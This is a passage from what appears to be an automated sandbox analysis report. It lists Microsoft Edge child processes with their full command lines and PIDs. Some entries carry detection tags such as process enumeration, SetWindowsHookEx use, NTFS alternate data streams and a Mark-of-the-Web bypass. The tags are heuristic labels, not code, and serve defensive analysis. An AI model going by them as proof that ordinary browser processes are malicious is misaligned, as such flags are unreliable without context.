  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
  2⤵
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2880 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5840 /prefetch:8
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7616 /prefetch:8
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7876 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4648 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8144 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7908 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
  2⤵
  PID:792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:3932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:2036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
  2⤵
  PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8232 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5756 /prefetch:8
  2⤵
  PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9028 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9024 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8836 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8292 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8692 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
